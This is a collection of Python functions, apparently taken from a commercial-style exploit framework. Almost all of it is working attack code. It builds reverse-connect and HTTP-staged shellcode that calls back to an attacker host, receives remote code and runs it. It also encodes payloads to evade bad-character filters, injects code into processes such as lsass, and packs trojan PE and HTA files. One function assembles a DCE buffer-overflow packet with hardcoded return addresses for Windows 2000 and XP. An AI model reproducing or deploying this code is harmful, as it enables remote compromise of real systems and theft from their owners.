def createInjectToSelf(self, localhost, localport, injectme="", vProtect=False, movetostack=False): """ Returns the shellcode, but not encoded, and does not set self.shellcode """ if injectme in ["", None]: sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp",{"subespval": 0}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", {"port" : localport, "ipaddress" : localhost}) sc.addAttr("loadFDasreg", {"reg" : "esi"}) sc.addAttr("RecvExecDepSafe",None) #MOSDEF sc.addAttr("ExitThread",None) self.callback.argsDict["fromcreatethread"] = 0 injectme = sc.get() sc = shellcodeGenerator.win32() sc.vProtectSelf=vProtect sc.addAttr("findeipnoesp", {"subespval": 0}) sc.addAttr("InjectToSelf", { "injectme" : injectme }) sc.addAttr("ExitThread", None) shellcode=sc.get() if movetostack: sc = shellcodeGenerator.win32() sc.standalone = 1 sc.addAttr("moveToStack", { "Length":len(shellcode) }) shellcode = sc.get() + shellcode return shellcode
def createHeapSafeInject(self, badstring, localhost, localport, injectme="", setdebugprivs=0): if injectme in ["", None]: sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0x1000}) sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", { "port": localport, "ipaddress": localhost }) sc.addAttr("CreateThreadRecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF #sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) sc.addAttr("ExitThread", None) self.callback.argsDict["fromcreatethread"] = 1 injectme = sc.get() # print "Dumping InjectMe Code:" + sc.getcode() sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0}) sc.addAttr("HeapSafeInject", { "injectme": injectme, "setdebugprivs": setdebugprivs }) sc.addAttr("ExitThread", None) injectcode = sc.get() #print "Dumping HeapSafeInject Code:" + sc.getcode() rawshellcode = injectcode if badstring == "": self.shellcode = rawshellcode return rawshellcode self.log("Raw shellcode (before encoding) is %d byte" % len(rawshellcode)) encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(badstring) self.log( "Encoding shellcode. This may take a while if we don't find a good value in the cache." ) shellcode = encoder.encode(rawshellcode) self.log("Done encoding shellcode.") if shellcode == "": self.log("Could not encode shellcode") raise "ErrorEncodingShellcode" self.setShellcode(shellcode) return shellcode
def maketrojan(self): host = self.callback.ip port = self.callback.port sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0x1000}) if self.useSSL: ssl = "s" else: ssl = "" sc.addAttr("httpGetShellcode", {"URL": "http%s://%s:%d/w" % (ssl, host, port)}) shellcode = sc.get() myPElib = pelib.PElib() self.mosdeftrojan = myPElib.createPEFileBuf(shellcode) self.log("Writing out %d bytes to %s" % (len(self.mosdeftrojan), self.trojanname)) self.htafile = self.file4hta(self.mosdeftrojan) file(self.trojanname, "wb").write(self.htafile) self.setInfo("%s - done" % (NAME)) ret = len(self.mosdeftrojan) != 0 return ret
def setup_mosdef_shellcode(self, nodetype): host = self.callback.ip port = self.callback.port if nodetype == "win32Node": self.log("Creating win32 shellcode to callback to %s:%s" % (host, port)) from shellcode import shellcodeGenerator sc = shellcodeGenerator.win32() sc.vProtectSelf = True sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", {"port": port, "ipaddress": host}) sc.addAttr("loadFDasreg", {"reg": "esi"}) sc.addAttr("RecvExecDepSafe", None) #MOSDEF sc.addAttr("ExitThread", None) self.shellcode = sc.get() elif nodetype == "win64Node": self.log("Creating win64 shellcode to callback to %s:%s" % (host, port)) p = payloads64.payloads() asm = p.callback(host, port, universal=False) bin = p.assemble(asm) self.shellcode = bin
def createShellcode(self): host = self.callback.ip port = self.callback.port self.localhost = host self.localport = port self.INFO, self.ADDY = targets[self.version] from shellcode import shellcodeGenerator self.log("Creating shellcode to callback to %s:%s" % (host, port)) sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": self.subesp}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", {"port": port, "ipaddress": host}) sc.addAttr("CreateThreadRecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread", None) rawshellcode = sc.get() if self.badstring == "": self.shellcode = rawshellcode return 1 self.log("Raw shellcode (before encoding) is %d byte" % len(rawshellcode)) #set up the shellcode self.encodeshellcode(rawshellcode) return 1
def createShellcode(self): """ create shellcode for the win """ # ret = self.createSmallWin32GOShellcode() from shellcode import shellcodeGenerator sc = shellcodeGenerator.win32() sc.addAttr("tcpconnect", { "port": self.callback.port, "ipaddress": self.callback.ip }) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) self.shellcode = sc.get() from encoder import chunkedaddencoder encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) self.shellcode = encoder.encode(self.shellcode) # these are just the numbers from makesploit() below offset = 492 size = 12 subesp = 5000 self.easychunk(offset, size, subesp) self.log("Total length of shellcode=%d" % len(self.shellcode)) return self.shellcode
def createShellcode(self): "default linux/windows callback" try: if targets[self.version][0].lower().find("linux") > -1: sc = shellcodeGenerator.linux_X86() sc.addAttr("connect", {"ipaddress":self.callback.ip, "port":self.callback.port}) sc.addAttr("read_and_exec", {"fdreg": "esi"}) self.shellcode = sc.get() elif targets[self.version][0].lower().find("windows") > -1: sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0x1000 }) #sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", {"port":self.callback.port, "ipaddress":self.callback.ip}) sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread", None) self.shellcode = sc.get() except: print "[!] did you forget to set -l -d on the commandline !?" self.shellcode = "\xcc" * 256 print "[!] shellcode length is %d bytes"% len(self.shellcode) return self.shellcode
def createShellcode(self): localhost = self.callback.ip localport = self.callback.port from shellcode import shellcodeGenerator sc = shellcodeGenerator.win32() sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", {"port": localport, "ipaddress": localhost}) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF self.shellcode = sc.get() from encoder import chunkedaddencoder encoder = chunkedaddencoder.intelchunkedaddencoder() encoder.setbadstring(self.badstring) self.log("Encoding shellcode") self.shellcode = encoder.encode(self.shellcode) if self.shellcode == "": self.log("Problem encoding shellcode") return 0 self.shellcode = self.tag2 + self.tag1 + self.shellcode from shellcode import win32shell self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2) from encoder import addencoder encoder = addencoder.inteladdencoder() encoder.setbadstring(self.searchbadstring) self.encodedsearchcode = encoder.encode(self.searchcode) if not self.encodedsearchcode: return None self.log( "Length of search shellcode: %d, length of real shellcode: %d\n" % (len(self.searchcode), len(self.shellcode))) return 1
def createShellcode(self): #localhost=self.callback.ip #localport=self.callback.port sc = shellcodeGenerator.win32() #sc.addAttr("ForkLoad", None) # the to fork code sc.addAttr("findeipnoesp", {"subespval": self.subesp}) #don't mess with eip sc.addAttr("isapiGOFindSock", None) sc.addAttr("ExitThread", None) #set up the shellcode self.shellcode = sc.get() self.log("Size of raw shellcode is %d" % len(self.shellcode)) encoder = chunkedaddencoder.intelchunkedaddencoder() #these are the characters not allowed by the exploit encoder.setbadstring(self.badstring) self.log( "Encoding shellcode. This may take a while if we don't find a good value in the cache." ) shellcode = encoder.encode(self.shellcode) self.log("Done encoding shellcode.") if shellcode == "": self.log("Could not encode shellcode") return 0 #debug int #shellcode="\xcc"+shellcode self.setShellcode(shellcode) self.log("Size of encoded shellcode is %d" % len(self.shellcode)) return 1
def createShellcode(self): sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": self.subesp}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", { "port": self.callback.port, "ipaddress": self.callback.ip }) sc.addAttr("CreateThreadRecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("TerminateThread", None) rawshellcode = sc.get() print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode) #then do a xor enconding using the real badstring encoder = xorencoder.simpleXOR() encoder.setbadstring(self.badstring) encoder.find_key(rawshellcode) self.shellcode = encoder.encode(rawshellcode) print "[!] Shellcode len: %d bytes" % len(self.shellcode) if not len(self.shellcode): return None return self.shellcode
def getHTTPStage2(self, httpHost, httpPort, ssl=""): " get the full protocol HTTP code over and a client id " from shellcode import shellcodeGenerator sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0x1000 }) args = {} # now it switches to a /c with the client id # and the protocol switches to double GETS args["URL"] = "http%s://%s:%d/c"%(ssl, httpHost, httpPort) devlog("http_mosdef","[!] getting new client ID ..") # XXX: is fine as the parent function (handle) is threaded and lock protected args["ID"] = self.get_new_client_id() self.last_client[-1].urlhost = httpHost self.last_client[-1].urlport = httpPort self.last_client[-1].ssl = ssl sc.addAttr("httpGetShellcode", args) devlog("http_mosdef", "client connect url: %s client id: %s"% (args["URL"], args["ID"])) return sc.get()
def getMosdefLoop(self, pSocket): """ returns a mosdef loop payload with an fd set """ ntype = self.node.nodetype if ntype == "win32Node": self.nlog("Generating 32bit Mosdef Shellcode") sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp",None) # we might be going into a process that doesn't have winsock loaded ! sc.addAttr("revert_to_self_before_importing_ws2_32", None) # XXX: to be DEP safe it needs an VirtualAlloc loop that just makes sre # XXX: code ends up in RWX paged memory, and not on the stack ;) sc.addAttr("RecvExecAllocLoop", {"fd" : pSocket}) sc.addAttr("ExitThread", {"closesocket":True}) return sc.get() elif ntype == "win64Node": self.nlog("Generating 64bit Mosdef Shellcode") p = secondstages64.SecondStages() asm = p.recvExecAllocLoopWithSocket(pSocket) return p.assemble(asm) else: # XXX: self.log_error("Node type not supported")
def createShellcode(self): host = self.callback.ip port = self.callback.port #return self.createWin32Shellcode(self.badstring,host,port) #should be createWin32HTTPShellcode() #return self.createTestShellcode() #return self.createWin32ThreadCallbackShellcode() #we set the virtual protect flag here because on Vista our shellcode is mapped 'READ_ONLY' httpWrapper = '' try: if self.HTTPMOSDEF: print '[!] using HTTP MOSDEF tunneling ..' sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': 0x1000}) if self.useSSL: ssl = 's' else: ssl = '' sc.addAttr('httpGetShellcode', {'URL': 'http%s://%s:%d' % (ssl, host, port)}) httpWrapper = sc.get() print '[!] HTTP MOSDEF len: %d bytes' % (len(httpWrapper)) except: httpWrapper = '' self.shellcode = self.createInjectToSelf(host, port, injectme=httpWrapper, movetostack=True) #print prettyprint(self.shellcode) return self.shellcode
def createShellcode(self): import shellcode.shellcodeGenerator as shellcodeGenerator sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': 3000}) sc.addAttr('revert_to_self_before_importing_ws2_32', None) sc.addAttr('tcpconnect', { 'port': self.callback.port, 'ipaddress': self.callback.ip }) sc.addAttr('CreateThreadRecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF sc.addAttr('ExitThread', None) rawshellcode = sc.get() import encoder.xorencoder as xorencoder encoder = xorencoder.simpleXOR() encoder.setbadstring(self.badstring) ret = encoder.find_key(rawshellcode) if ret == 0: self.log('Could not find a key for this shellcode!') raise Exception, 'No shellcode generated' self.shellcode = encoder.encode(rawshellcode) if self.shellcode == '': raise Exception, 'No shellcode generated' self.log('Xor key used: %x' % (encoder.getkey())) self.log('Length of shellcode=%s' % (len(self.shellcode))) return self.shellcode
def createShellcode(self): from shellcode import shellcodeGenerator httpWrapper = "" try: if self.HTTPMOSDEF == True: self.log("[!] using HTTP MOSDEF tunneling payload ..") sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0x1000}) sc.addAttr("revert_to_self_before_importing_ws2_32", None) # this is what you need your exploits to port them to HTTPS MOSDEF compatibility if self.useSSLMOSDEF == True: ssl = "s" else: ssl = "" # end of change sc.addAttr( "httpGetShellcode", { "URL": "http%s://%s:%d" % (ssl, self.callback.ip, self.callback.port) }) httpWrapper = sc.get() self.log("[!] HTTP MOSDEF len: %d bytes" % len(httpWrapper)) except Exception, msg: #print "Exception in HTTP MOSDEF Payload generation: %s" % msg httpWrapper = ""
def createHeapShellcode(self): #for all of the exploits to prevent the heap corruption from disturbing us if self.callback == None: self.log("Cannot create heap shellcode without a callback...") host = self.callback.ip port = self.callback.port # switch into bind port mode on "0.0.0.0" if self.am_bind_shellcode(): key = ("WIN32 HEAP BIND", self.callback.port, self.badstring) sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0x1000}) sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("BindMosdef", {"port": self.callback.port}) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread", None) injectcode = sc.get() self.shellcode = self.createHeapSafeInjectIntoProcess( self.badstring, host, port, smallcode=0, injectme=injectcode) else: key = ("WIN32 HEAP CALLBACK", host, port, self.badstring) #if smallcode is zero, then use fromcreatethread if running from commandline. # defaults to LSASS.EXE and lsass.exe self.shellcode = self.createHeapSafeInjectIntoProcess( self.badstring, host, port, smallcode=0) return self.shellcode
def createShellcode(self): #get us a clean stack to play with and save the original EBP for continuation of execution injectme = self.createWin32Shellcode_universal(self.badstring, self.callback.ip, self.callback.port) sc = shellcodeGenerator.win32() sc.vProtectSelf=False sc.vAllocSelf = False sc.addAttr("findeipnoesp", {"subespval": 0}) sc.addAttr("InjectToSelf", { "injectme" : injectme }) self.shellcode = sc.get() self.badstring = "\00" enc=xorencoder.simpleXOR() enc.subesp=5000 enc.setbadstring(self.badstring) ret=enc.find_key(self.shellcode) if ret==0: self.log("Could not generate key for this shellcode!") raise Exception, "No shellcode generated" self.shellcode=enc.encode(self.shellcode) if self.shellcode=="": raise Exception, "No shellcode generated" self.log("Xor key used: %x"%enc.getkey()) self.log("Length of shellcode=%s"%len(self.shellcode)) return len(self.shellcode)
def createShellcode(self): sc=shellcodeGenerator.win32() sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip}) sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread",None) rawshellcode=sc.get() print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode) #first encode to nibble enc = nibble_encoder.intel_nibbleencoder() bad = "" for i in range(ord('A'),ord('Z')+1): #for a-z inclusive, these are badchars bad+=chr(i) enc.setbadstring(bad) rawshellcode = enc.encode(rawshellcode) print "[!] Nibble Encoded Shellcode len: %d bytes" % len(rawshellcode) #then do a xor enconding using the real badstring encoder = xorencoder.simpleXOR() encoder.setbadstring(self.badstring) encoder.find_key(rawshellcode) self.shellcode = encoder.encode(rawshellcode) print "[!] Shellcode len: %d bytes" % len(self.shellcode) if not len(self.shellcode): return None return self.shellcode
def createShellcode(self): host=self.callback.ip port=self.callback.port self.version=self.argsDict["version"] if self.version==0: self.test() if self.version==0: self.log("Could not find version - no shellcode created") return "" if self.version == SUNONEWIN32 or self.version == SUNONEWIN32_2K: self.remoteport = port from shellcode import shellcodeGenerator #sc = shellcodeGenerator.win32() #sc.addAttr("tcpconnect", {"port" : port, "ipaddress" : host}) #sc.addAttr("initstackswap", None) #sc.addAttr("stackSwap", None) #self.shellcode = sc.get() #encoder = chunkedaddencoder.intelchunkedaddencoder() #encoder.setbadstring(self.badstring) #self.log("Encoding shellcode") #self.shellcode = encoder.encode(self.shellcode) #if self.shellcode == "": # self.log("Problem encoding shellcode") # return 0 # MOSDEF sc = shellcodeGenerator.win32() self.log("Generating shellcode with port %s and ip %s"%(port,host)) sc.addAttr("tcpconnect", {"port" : port, "ipaddress" : host}) sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF self.shellcode = sc.get() self.log("Raw win32 shellcode length: %d"%len(self.shellcode)) return self.shellcode
def createShellcode(self): if not self.callback: self.log("No callback needed for this Node type") else: host = self.callback.ip port = self.callback.port caps = self.argsDict["passednodes"][0].capabilities if "win32api" in caps: self.log("Creating shellcode to callback to %s:%s" % (host, port)) from shellcode import shellcodeGenerator sc = shellcodeGenerator.win32() #sc.addAttr("ForkLoad", None) # the to fork code sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", {"port": port, "ipaddress": host}) sc.addAttr("CreateThreadRecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread", None) self.shellcode = sc.get() self.listenerArgsDict["fromcreatethread"] = 1 return self.shellcode else: self.log("Not creating shellcode for this node type") return ""
def createShellcode(self): localhost = self.callback.ip localport = self.callback.port sc = shellcodeGenerator.win32() sc.addAttr('SearchCodeSafeSEH', {'tag': 0x46494a45}) #'c00k' sc.standalone = 1 self.searchcode = sc.get() open("searchcode.s", "w").write(sc.code) #sc = shellcodeGenerator.win32() #sc.addAttr("OrigamiInjectSmall", { "ipaddress": localhost, "port": localport, "processname": "CdfSvc.exe"}) #sc.addAttr("ExitThread", None) #self.callback.argsDict["fromcreatethread"] = 1 self.shellcode = sc.get() open("shellcode.s", "w").write(sc.code) import shellcode.clean.windows.payloads as payloads p = payloads.payloads() sc = p.forkload(localhost, localport, restorehash=True, load_winsock=True, processname="dmremote") self.shellcode = p.assemble(sc) #self.createWin32Shellcode(self.badstring,localhost,localport) #self.createHeapSafeInjectIntoProcess(self.badstring, localhost, localport, smallcode=1, processname="CdfSvc.exe", backupprocess="cdfsvc.exe") # Fixup Code: code = "movl $0x%08x, %%eax\nmov %%eax, (0x%08x) " % ( (self.PTR + 0x2C), (self.PTR + 0x2C)) fixup_code = mosdef.assemble(code, "X86") self.shellcode = struct.pack( "<L", 0x46494a45) * 2 + fixup_code + self.shellcode return self.shellcode
def get_trojan(self): trojan = '' try: sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': 0}) sc.addAttr('revert_to_self_before_importing_ws2_32', None) sc.addAttr('tcpconnect', { 'port': self.callback_port, 'ipaddress': self.callback_ip }) mosdef_type = self.engine.getMosdefType( canvasengine.WIN32MOSDEF_INTEL) mosdef_id = self.engine.getNewMosdefID(self) sc.addAttr("send_universal", { "mosdef_type": mosdef_type, "mosdef_id": mosdef_id }) sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'}) sc.addAttr("ExitThread", None) sc.vAllocSelf = True #we need to move to another page! myPElib = pelib.PElib() trojan = myPElib.createPEFileBuf(sc.get()) except: import traceback traceback.print_exc(file=sys.stderr) return trojan
def createShellcode(self): host = self.callback.ip port = self.callback.port self.localhost = host self.localport = port sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0x1000}) #callback #sc.addAttr("revert_to_self_before_importing_ws2_32", None) ws2_32 already loaded sc.addAttr("tcpconnect", {"port": port, "ipaddress": host}) sc.addAttr("CreateThreadRecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread", None) #GOcode too big for now, use the ordinal code later #sc.addAttr("GOFindSock",None) #sc.addAttr("LoadRegAsFD", {"reg" : "esi"}) #sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF #sc.addAttr("ExitThread", None) rawshellcode = sc.get() """ self.log("Raw shellcode (before encoding) is %d byte"%len(rawshellcode)) encoder= addencoder.inteladdencoder() encoder.setbadstring(self.badstring) self.log( "Encoding shellcode. This may take a while if we don't find a good value in the cache.") shellcode=encoder.encode(rawshellcode) self.log( "Done encoding shellcode.") if shellcode=="": self.log( "Could not encode shellcode") raise "ErrorEncodingShellcode" """ cnt = 0xff while cnt: shellcode = self.xorEncode(rawshellcode, cnt) if shellcode != "": break else: cnt -= 1 if len(shellcode) == 0: raise Exception, "Could not encode shellcode!" """ print "< %d" % shellcode.count("<") print "> %d" % shellcode.count(">") print "@ %d" % shellcode.count("@") print ": %d" % shellcode.count(":") print "\\r %d" % shellcode.count("\r") print "\\n %d" % shellcode.count("\n") print "NULL %d" % shellcode.count("\x00") for each in shellcode: print "%2.x " % ord(each), print "\n" """ self.shellcode = shellcode self.log("length of real shellcode: %d" % (len(self.shellcode))) return self.shellcode
def createShellcode(self): sc = shellcodeGenerator.win32() sc.addAttr("GOFindSock", None) sc.addAttr("RecvExecWin32", None) self.shellcode = sc.get() self.log("[!] Unencoded GOFindSock + RecvExecWin32 len: %d" % len(self.shellcode)) return self.shellcode
def createShellcode(self): # for test only localhost = "192.168.1.103" localport = 8090 sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0x1000}) sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", {"port": localport, "ipaddress": localhost}) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) # MOSDEF sc.addAttr("ExitThread", None) injectme = sc.get() sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0}) sc.addAttr("InjectToSelf", {"injectme": injectme}) sc.addAttr("ExitThread", None) return sc.get()
def createShellcode(self): sc = shellcodeGenerator.win32() sc.addAttr('findeipnoesp', {'subespval': 0}) sc.addAttr('revert_to_self_before_importing_ws2_32', None) sc.addAttr('tcpconnect', { 'port': self.callback.port, 'ipaddress': self.callback.ip }) sc.addAttr('CreateThreadRecvExecWin32', {'socketreg': 'FDSPOT'}) #MOSDEF sc.addAttr('ExitThread', None) rawshellcode = sc.get() #Due to unicode encoding strangeness between XP SP0 and XP SP1a, the following #encoder was implemented to avoid all the characters between 0x80 and 0x9f while (len(rawshellcode) % 4) != 0: rawshellcode += 'A' SIZE = len(rawshellcode) / 4 if SIZE > 0xff: #should be enough? raise Exception, 'Shellcode too long!' while (SIZE >= 0x80) and ( SIZE <= 0x9f): #increase SIZE if within the badchars range rawshellcode += 'BBBB' SIZE += 1 #the encoding scheme is pretty self explanatory encodedshellcode = '' for i in range(0, len(rawshellcode), 4): L = struct.unpack('<L', rawshellcode[i:i + 4])[0] HIGH = ((L & 0xf0f0f0f0) >> 4) + 0x40404040 LOW = (L & 0x0f0f0f0f) + 0x40404040 encodedshellcode += struct.pack('<LL', HIGH, LOW) decoder = '' decoder += '\xd9\xee' # 0: fldz decoder += '\xd9\x74\x24\xf4' # 2: fnstenv 0xfffffff4(%esp) decoder += '\x5e' # 6: pop %esi decoder += '\x6a\x28' # 7: push $0x28 decoder += '\x59' # 9: pop %ecx decoder += '\x03\xf1' # a: add %ecx,%esi decoder += '\x56' # c: push %esi decoder += '\x5f' # d: pop %edi decoder += '\xb1' + chr(SIZE) # e: mov $SIZE,%cl decoder += '\xad' #10: lods %ds:(%esi),%eax decoder += '\x2d\x40\x40\x40\x40' #11: sub $0x40404040,%eax decoder += '\xc1\xe0\x04' #16: shl $0x4,%eax decoder += '\x50' #19: push %eax decoder += '\x5a' #1a: pop %edx decoder += '\xad' #1b: lods %ds:(%esi),%eax decoder += '\x2d\x40\x40\x40\x40' #1c: sub $0x40404040,%eax decoder += '\x03\xc2' #21: add %edx,%eax decoder += '\xab' #23: stos %eax,%es:(%edi) decoder += '\xe2\xea' #24: loop 0x10 decoder += '\x41' #26: inc %ecx decoder += '\x41' #27: inc %ecx self.shellcode = decoder + encodedshellcode self.log('Total shellcode length=%d' % (len(self.shellcode))) return self.shellcode
def buildDcePacket(self): self.info,self.eip=targets[self.version] data='' packet='' data+='\\\0\\\0' if self.version==1: #Windows 2000 SP4, XP SP1a bufferXP='A'*(0xf048-0xef20) bufferXP+=struct.pack('<L',self.eip[1]) #eip XP bufferXP+='C'*8 data+=bufferXP buffer2K=self.shellcode buffer2K+='D'*(0xf1d0-0xeccc-len(self.shellcode)-len(bufferXP)) buffer2K+=struct.pack('<L',self.eip[0]) #eip 2000 buffer2K+='F'*8 buffer2K+=mosdef.assemble('jmp $-%d'%(len(buffer2K)+5),'x86') #jmp back data+=buffer2K if (len(data)%2)==1: data+='G' data+='\\\0H\0' packet+=intel_order(1) packet+=s_dce_win2k_unistring('F') packet+=s_dce_raw_unistring(data) packet+=intel_order(0) elif self.version>=2: #XP SP2 with DEP from shellcode import shellcodeGenerator sc=shellcodeGenerator.win32() sc.addAttr('SmallSearchCode',{'tag':0x6b303063}) #'c00k' sc.standalone=1 searchcode=self.wc_encodeshellcode(sc.get()) bufferXP=searchcode bufferXP+='A'*(0xf000-0xeeec-len(bufferXP)) bufferXP+=mosdef.assemble('jmp $-%d'%(len(bufferXP)+5),'x86') #jmp back bufferXP+='B'*(0xf014-0xeeec-len(bufferXP)) bufferXP+=struct.pack('<L',self.eip[0]) bufferXP+='C'*8 bufferXP+=struct.pack('<L',self.eip[1]) bufferXP+=struct.pack('<L',self.eip[3]) bufferXP+='D'*16 bufferXP+=struct.pack('<L',self.eip[2]) bufferXP+='E'*4 bufferXP+='\xeb\xd6' #esi is restored from here, jmp back data+=bufferXP data+='\\\x00F\x00' if (len(self.shellcode)%2)==1: self.shellcode+='G' packet+=intel_order(1) packet+=s_dce_raw_unistring('c00k'+self.shellcode) packet+=s_dce_raw_unistring(data) packet+=intel_order(0) return packet
def buildTrojan(self, type="Linux", arch="X86"): "build a MOSDEF based trojan binary" mosdeftrojan = "" if type in ["Linux", "Solaris"]: from MOSDEF import makeexe from MOSDEF.cc import threadsafe_cc_main self.log("[!] Compiling Unix trojan") infilename = "backdoors/cback_mmap_rwx.c" vars = {} vars['CBACK_PORT'] = self.callback.port vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip)) self.log("[!] Callback address is %s" % vars['CBACK_ADDR']) cc_command = [] for var in vars: cc_command += ["-D", "%s=%s" % (var, vars[var])] cc_command += ["-v", "-m", type, "-p", arch, infilename] self.log("[!] CC command: %s" % cc_command) mosdeftrojan = threadsafe_cc_main(cc_command) if not mosdeftrojan: self.log("[X] Was unable to create trojan!") return "" self.log("[!] Length of CC compiled trojan: %s" % len(mosdeftrojan)) elif type in ["Windows"]: from MOSDEF import pelib from shellcode import shellcodeGenerator sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", { "port": self.callback.port, "ipaddress": self.callback.ip }) sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF sc.addAttr("ExitThread", None) shellcode = sc.get() myPElib = pelib.PElib() mosdeftrojan = myPElib.createPEFileBuf(shellcode) if mosdeftrojan == None: self.log("Some sort of error compiling our PE") return "" self.log("[!] Win32 MOSDEF Trojan compiled to %d bytes" % len(mosdeftrojan)) return mosdeftrojan
def createShellcode(self): from shellcode import shellcodeGenerator sc=shellcodeGenerator.win32() sc.addAttr ('tcpconnect',{'port':self.callback.port,'ipaddress':self.callback.ip}) sc.addAttr('SmallRecvExecWin32',{'socketreg':'FDSPOT'}) #MOSDEF sc.addAttr('UseWS2Ordinal',None) rawshellcode=sc.get() raw=sc.get() # ASCII encoder encoder=printable.intelprintableencoder() self.shellcode=encoder.encode (raw) return self.shellcode
def createShellcode(self): from shellcode import shellcodeGenerator sc=shellcodeGenerator.win32() sc.addAttr('findeipnoesp',None) if self.version==1: sc.addAttr('Fix RtlEnterCriticalSection',{'SimpleFix':1}) else: sc.addAttr('UseWS2Ordinal',None) sc.addAttr('tcpconnect',{'port':self.callback.port,'ipaddress':self.callback.ip}) sc.addAttr('SmallRecvExecWin32',{'socketreg':'FDSPOT'}) #MOSDEF print sc.getcode() self.shellcode=sc.get() return self.shellcode
def create_shellcode(self): host = self.callback_host port = self.callback_port mosdef_type = self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL) mosdef_id = self.engine.getNewMosdefID(self) sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": self.subesp}) #don't mess with eip sc.addAttr("revert_to_self_before_importing_ws2_32", None) sc.addAttr("tcpconnect", {"port": port, "ipaddress": host}) sc.addAttr("send_universal", { "mosdef_type": mosdef_type, "mosdef_id": mosdef_id }) sc.addAttr("loadFDasreg", {"reg": "esi"}) sc.addAttr("RecvExecDepSafe", None) #MOSDEF sc.addAttr("ExitProcess", None) proxy_payload = sc.get() # Here we use a shellcode with a custom exit stub ending_shellcode = "andl $0xffffff00,%ebx\n" ending_shellcode += "jmp %ebx" sc = shellcodeGenerator.win32() sc.addAttr("findeipnoesp", {"subespval": 0}) sc.addAttr( "InjectToSelf", { "injectme": proxy_payload, "DONTEXIT": True, 'customexit': ending_shellcode }) rawshellcode = sc.get() return rawshellcode